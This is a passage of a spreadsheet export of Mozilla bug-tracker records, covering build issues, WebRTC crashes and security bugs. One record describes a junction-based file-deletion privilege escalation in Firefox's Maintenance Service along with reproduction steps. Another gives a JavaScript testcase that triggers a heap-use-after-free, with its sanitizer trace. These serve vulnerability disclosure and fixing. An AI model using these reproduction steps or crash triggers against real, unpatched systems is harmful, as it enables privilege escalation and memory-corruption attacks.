      <c r="E5064" t="n">
        <v>1</v>
      </c>
      <c r="F5064" t="n">
        <v>1</v>
      </c>
      <c r="G5064" t="n">
        <v>5</v>
      </c>
      <c r="H5064" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5064" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5064" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5064" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5064" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5064" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5064" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5064" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5064" t="inlineStr"/>
      <c r="Q5064" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5064" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5064" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5064" t="n">
        <v>1</v>
      </c>
      <c r="U5064" t="n">
        <v>0</v>
      </c>
      <c r="V5064" t="n">
        <v>6</v>
      </c>
      <c r="W5064" t="inlineStr">
        <is>
          <t>All the 8.8.1 machines look busted (alice says this is because mc no longer runs on tiger), and for some reason the 9.0 Tp4 machines are only picking up occasional builds, and I can't seem to get them to pick up mine.</t>
        </is>
      </c>
      <c r="X5064" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5065">
      <c r="A5065" t="n">
        <v>1280443</v>
      </c>
      <c r="B5065" t="inlineStr">
        <is>
          <t>2016-06-16 06:26:25 -0700</t>
        </is>
      </c>
      <c r="C5065" t="inlineStr">
        <is>
          <t>Crash in nr_socket_sendto</t>
        </is>
      </c>
      <c r="D5065" t="inlineStr">
        <is>
          <t>2017-01-05 09:13:02 -0800</t>
        </is>
      </c>
      <c r="E5065" t="n">
        <v>1</v>
      </c>
      <c r="F5065" t="n">
        <v>1</v>
      </c>
      <c r="G5065" t="n">
        <v>3</v>
      </c>
      <c r="H5065" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5065" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5065" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K5065" t="inlineStr">
        <is>
          <t>48 Branch</t>
        </is>
      </c>
      <c r="L5065" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5065" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5065" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5065" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5065" t="inlineStr">
        <is>
          <t>[adv-main48+]</t>
        </is>
      </c>
      <c r="Q5065" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5065" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5065" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T5065" t="n">
        <v>1</v>
      </c>
      <c r="U5065" t="n">
        <v>0</v>
      </c>
      <c r="V5065" t="n">
        <v>36</v>
      </c>
      <c r="W5065" t="inlineStr">
        <is>
          <t>From crash-stats:
https://crash-stats.mozilla.com/signature/?date=%3E01%2F01%2F2016&amp;signature=nr_socket_sendto&amp;_columns=date&amp;_columns=product&amp;_columns=version&amp;_columns=build_id&amp;_columns=platform&amp;_columns=reason&amp;_columns=address&amp;page=1#reports
As of 48, we are seeing crashes in nr_socket_sendto, some of which look like UAF. Here's the mtransport stuff that landed in 48:
https://bugzilla.mozilla.org/buglist.cgi?list_id=13071777&amp;resolution=FIXED&amp;query_format=advanced&amp;component=WebRTC%3A%20Networking&amp;target_milestone=mozilla48
It might have something to do with ICE restart, but it is hard to say yet. My preliminary analysis of the source did not turn anything up. It may be some bug elsewhere has crept in, but I looked over the timer stuff and I didn't see anything scary.</t>
        </is>
      </c>
      <c r="X5065" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5066">
      <c r="A5066" t="n">
        <v>1215648</v>
      </c>
      <c r="B5066" t="inlineStr">
        <is>
          <t>2015-10-16 12:25:05 -0700</t>
        </is>
      </c>
      <c r="C5066" t="inlineStr">
        <is>
          <t>Maintenance Service helper.exe File Deletion Elevation of Privilege</t>
        </is>
      </c>
      <c r="D5066" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:24 -0700</t>
        </is>
      </c>
      <c r="E5066" t="n">
        <v>1</v>
      </c>
      <c r="F5066" t="n">
        <v>1</v>
      </c>
      <c r="G5066" t="n">
        <v>2</v>
      </c>
      <c r="H5066" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5066" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5066" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K5066" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5066" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5066" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5066" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5066" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5066" t="inlineStr">
        <is>
          <t>[adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q5066" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5066" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5066" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T5066" t="n">
        <v>1</v>
      </c>
      <c r="U5066" t="n">
        <v>0</v>
      </c>
      <c r="V5066" t="n">
        <v>31</v>
      </c>
      <c r="W5066" t="inlineStr">
        <is>
          <t>Created attachment 8675071
poc.zip
The helper.exe creates a directory "ns{random character a-z generated with GetTickCount%26}{16bit hex value from GetTickCount()}.tmp" during execution in the C:\Windows\Temp directory und deletes it later. 
At least in win7 the temp directory is writable for non privileged users. If during the execution a junction is created in the nsXXXX.tmp directory also the content of the target directory of the junction will be deleted from the helper.exe.
With the maintenance service and this vulnerbility it is possible to delete arbitrary files for non privileged users. Further with the ability to delete arbitrary files it´s possible to elevate privilege further.
The poc tries to empty the C:\test directory by creating a junction to it in the C:\Windows\temp\nsXXXX.tmp during the execution of the helper.exe. I have tested it with win7.
1.) first create the test directory which contains a file.
2.) in the updatework directory right to the loop.bat copy the updater.exe from the firefox directory and a current complete update mar file named to update.mar of the target firefox version (for example: https://ftp.mozilla.org/pub/mozilla.org/firefox/releases/latest/update/win32/de/firefox-41.0.2.complete.mar)
3.) alter the paths in the loop.bat
4.) start the poc.exe and poc.bat and after a short time if the poc.exe is closed the C:\test directory will be empty.</t>
        </is>
      </c>
      <c r="X5066" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5067">
      <c r="A5067" t="n">
        <v>1355039</v>
      </c>
      <c r="B5067" t="inlineStr">
        <is>
          <t>2017-04-10 03:35:55 -0700</t>
        </is>
      </c>
      <c r="C5067" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::net::PredictorLearn</t>
        </is>
      </c>
      <c r="D5067" t="inlineStr">
        <is>
          <t>2024-05-30 09:31:30 -0700</t>
        </is>
      </c>
      <c r="E5067" t="n">
        <v>1</v>
      </c>
      <c r="F5067" t="n">
        <v>1</v>
      </c>
      <c r="G5067" t="n">
        <v>3</v>
      </c>
      <c r="H5067" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5067" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5067" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K5067" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5067" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5067" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5067" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5067" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5067" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q5067" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5067" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5067" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T5067" t="n">
        <v>1</v>
      </c>
      <c r="U5067" t="n">
        <v>0</v>
      </c>
      <c r="V5067" t="n">
        <v>32</v>
      </c>
      <c r="W5067" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest ASAN build of Firefox (BuildID=20170408204920). It may need a few reloads and requires the fuzzPriv extension.
&lt;script&gt;
function start () {
	o3=document;
	o31=document.createElement('audio');
	o32=document.createElement('track');
	o31.appendChild(o32);
	o3.write('&lt;html&gt;');
	o31.controls^=1;
	o3.documentElement.appendChild(o31);
	o38=document.createElement('iframe');
	o41=document.createElement('iframe');
	document.documentElement.appendChild(o41);
	document.documentElement.appendChild(o38);
	o3.write("!DOCTYPE&lt;li id='id12'&gt;");
	o3.location.hash='id12';
	o38.contentWindow.location.reload();
        o76=frames[1].document;
        o38.src="data:text/html,&lt;div&gt;2";
        o87=frames[1];
        o97=document.createElement('iframe');
        document.documentElement.appendChild(o97);
        o38.src="data:text/html,&lt;div&gt;3";
        setTimeout(fun1,4);
	o76.write('&lt;iframe&gt;');
	o38.src="data:text/html,&lt;div&gt;";
	o2219=o87.frames[0].document;
	o2219.write('&lt;html&gt;');
}
function fun1() {
	o2454=o2219.createElement('audio');
	o2455=document.createElement('track');
	o2454.appendChild(o2455);
	o2219.close();
	o2219.write('&lt;html&gt;');
	o2454.controls^=1;
	o2219.documentElement.appendChild(o2454);
	o2219.defaultView.onerror=fun2;
	o38.contentWindow.location.reload();
	setTimeout("location.reload()",100);
}
function fun2() {
	try{o76.location.hash='x';}catch(e){}
	window.fuzzPriv.CC();window.fuzzPriv.GC();window.fuzzPriv.CC();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==23074==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d0000c9df0 at pc 0x7f02927069ce bp 0x7fffecb44f90 sp 0x7fffecb44f88
READ of size 8 at 0x60d0000c9df0 thread T0 (Web Content)
    #0 0x7f02927069cd in IsNullOrHttp /home/worker/workspace/build/src/netwerk/base/Predictor.cpp:191:8
    #1 0x7f02927069cd in mozilla::net::PredictorLearn(nsIURI*, nsIURI*, unsigned int, mozilla::OriginAttributes const&amp;) /home/worker/workspace/build/src/netwerk/base/Predictor.cpp:2248
    #2 0x7f029b10340b in nsDocShell::InternalLoad(nsIURI*, nsIURI*, bool, nsIURI*, unsigned int, nsIPrincipal*, nsIPrincipal*, unsigned int, nsAString const&amp;, char const*, nsAString const&amp;, nsIInputStream*, nsIInputStream*, unsigned int, nsISHEntry*, bool, nsAString const&amp;, nsIDocShell*, nsIURI*, bool, nsIDocShell**, nsIRequest**) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:10780:3
    #3 0x7f029b1371ab in nsDocShell::Reload(unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5502:10
    #4 0x7f0294d6148f in mozilla::dom::Location::Reload(bool) /home/worker/workspace/build/src/dom/base/Location.cpp:814:18
    #5 0x7f029551493b in Reload /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Location.h:74:14
    #6 0x7f029551493b in mozilla::dom::LocationBinding::reload(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Location*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/LocationBinding.cpp:873
    #7 0x7f029689344e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
    #8 0x7f029c0ccc63 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #9 0x7f029c0ccc63 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:455
    #10 0x7f029c0cd612 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:519:10
    #11 0x7f029cce08ee in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #12 0x7f029cc97f94 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #13 0x7f029ccc1153 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #14 0x7f029ccc3ab7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #15 0x7f029c0ccfb3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #16 0x7f029c0ccfb3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:437
    #17 0x7f029c0b568f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:506:12
    #18 0x7f029c0b568f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2997
    #19 0x7f029c09bb28 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:395:12
    #20 0x7f029c0ccde8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473:15
    #21 0x7f029c0cd612 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:519:10
    #22 0x7f029ca4c17b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2885:12
    #23 0x7f029644416e in mozilla::dom::Function::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
    #24 0x7f0294c1f3d6 in Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:72:12
    #25 0x7f0294c1f3d6 in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13105
    #26 0x7f0294dd1326 in mozilla::dom::TimeoutManager::RunTimeout(mozilla::dom::Timeout*) /home/worker/workspace/build/src/dom/base/TimeoutManager.cpp:607:42
    #27 0x7f0294dcc7cd in mozilla::dom::(anonymous namespace)::TimerCallback(nsITimer*, void*) /home/worker/workspace/build/src/dom/base/Timeout.cpp:65:49
    #28 0x7f02925f188f in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:498:7
    #29 0x7f02925c0aab in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:284:11
    #30 0x7f02925d34c2 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:200:22
    #31 0x7f02925d2dcf in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:74:15
    #32 0x7f02925b0dd1 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:259:32
    #33 0x7f02925e3b90 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #34 0x7f02925e05d8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #35 0x7f029339de01 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #36 0x7f02932fffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #37 0x7f02932fffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #38 0x7f02932fffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #39 0x7f02986125ff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #40 0x7f029bc16a17 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:22
    #41 0x7f02932fffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #42 0x7f02932fffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #43 0x7f02932fffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #44 0x7f029bc1640f in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:699:34
    #45 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #46 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #47 0x7f02adc8082f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #48 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)
0x60d0000c9df0 is located 0 bytes inside of 136-byte region [0x60d0000c9df0,0x60d0000c9e78)
freed by thread T0 (Web Content) here:
    #0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f02927e102b in mozilla::net::nsSimpleURI::Release() /home/worker/workspace/build/src/netwerk/base/nsSimpleURI.cpp:49:1
    #2 0x7f029b14fdac in Release /home/worker/workspace/build/src/dom/base/nsDOMNavigationTiming.h:31:3
    #3 0x7f029b14fdac in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:40
    #4 0x7f029b14fdac in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:395
    #5 0x7f029b14fdac in assign_assuming_AddRef /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:65
    #6 0x7f029b14fdac in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:166
    #7 0x7f029b14fdac in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7645
    #8 0x7f029b14c218 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7465:7
    #9 0x7f029b15336f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7362:13
    #10 0x7f0293ecfb59 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1276:3
    #11 0x7f0293eceb0c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:860:14
    #12 0x7f0293ecb958 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:749:9
    #13 0x7f0293ecd822 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:631:5
    #14 0x7f0293ece54c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:487:14
    #15 0x7f0292792602 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #16 0x7f029278eab3 in mozilla::net::nsLoadGroup::Cancel(nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:265:15
    #17 0x7f0293ecaf8f in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:245:22
    #18 0x7f029b0dd0c9 in Stop /home/worker/workspace/build/src/docshell/base/nsDocShell.h:190:25
    #19 0x7f029b0dd0c9 in nsDocShell::Stop(unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5566
    #20 0x7f029b102c24 in nsDocShell::InternalLoad(nsIURI*, nsIURI*, bool, nsIURI*, unsigned int, nsIPrincipal*, nsIPrincipal*, unsigned int, nsAString const&amp;, char const*, nsAString const&amp;, nsIInputStream*, nsIInputStream*, unsigned int, nsISHEntry*, bool, nsAString const&amp;, nsIDocShell*, nsIURI*, bool, nsIDocShell**, nsIRequest**) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:10700:12
    #21 0x7f029b1371ab in nsDocShell::Reload(unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5502:10
    #22 0x7f0294d6148f in mozilla::dom::Location::Reload(bool) /home/worker/workspace/build/src/dom/base/Location.cpp:814:18
    #23 0x7f029551493b in Reload /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Location.h:74:14
    #24 0x7f029551493b in mozilla::dom::LocationBinding::reload(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Location*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/LocationBinding.cpp:873
    #25 0x7f029689344e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
    #26 0x7f029c0ccc63 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #27 0x7f029c0ccc63 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:455
    #28 0x7f029c0cd612 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:519:10
    #29 0x7f029cce08ee in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7f029cc97f94 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #31 0x7f029ccc1153 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #32 0x7f029ccc3ab7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #33 0x7f029c0ccfb3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #34 0x7f029c0ccfb3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:437
    #35 0x7f029c0b568f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:506:12
    #36 0x7f029c0b568f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2997
    #37 0x7f029c09bb28 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:395:12
    #38 0x7f029c0ccde8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473:15
    #39 0x7f029c0cd612 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:519:10
previously allocated by thread T0 (Web Content) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f02927e8f04 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f02927e8f04 in mozilla::net::nsSimpleURI::StartClone(mozilla::net::nsSimpleURI::RefHandlingEnum, nsACString const&amp;) /home/worker/workspace/build/src/netwerk/base/nsSimpleURI.cpp:594
    #4 0x7f02927e9574 in mozilla::net::nsSimpleURI::CloneInternal(mozilla::net::nsSimpleURI::RefHandlingEnum, nsACString const&amp;, nsIURI**) /home/worker/workspace/build/src/netwerk/base/nsSimpleURI.cpp:635:31
    #5 0x7f0292777571 in NS_EnsureSafeToReturn(nsIURI*, nsIURI**) /home/worker/workspace/build/src/netwerk/base/nsNetUtil.cpp:1777:24
    #6 0x7f02927779cf in ToImmutableURI /home/worker/workspace/build/src/netwerk/base/nsIOService.cpp:1569:19
    #7 0x7f02927779cf in non-virtual thunk to mozilla::net::nsIOService::ToImmutableURI(nsIURI*, nsIURI**) /home/worker/workspace/build/src/netwerk/base/nsIOService.cpp:1562
    #8 0x7f02927ae23d in NS_TryToMakeImmutable(nsIURI*, nsresult*) /home/worker/workspace/build/src/netwerk/base/nsNetUtil.cpp:1805:20
    #9 0x7f029b10b1e8 in nsDocShell::SetCurrentURI(nsIURI*, nsIRequest*, bool, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:1985:17
    #10 0x7f029b14bd71 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7422:9
    #11 0x7f029b15336f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7362:13
    #12 0x7f0293ecfb59 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1276:3
    #13 0x7f0293ece2ef in nsDocLoader::FireOnStateChange(nsIWebProgress*, nsIRequest*, int, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1239:14
    #14 0x7f0293eccc94 in doStartURLLoad /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:797:3
    #15 0x7f0293eccc94 in nsDocLoader::OnStartRequest(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:481
    #16 0x7f0293eccf8c in non-virtual thunk to nsDocLoader::OnStartRequest(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:392:14
    #17 0x7f02927914da in mozilla::net::nsLoadGroup::AddRequest(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:510:28
    #18 0x7f0297096bdd in nsHTMLDocument::CreateAndAddWyciwygChannel() /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2416:21
    #19 0x7f02970950f8 in nsHTMLDocument::Open(JSContext*, nsAString const&amp;, nsAString const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1778:3
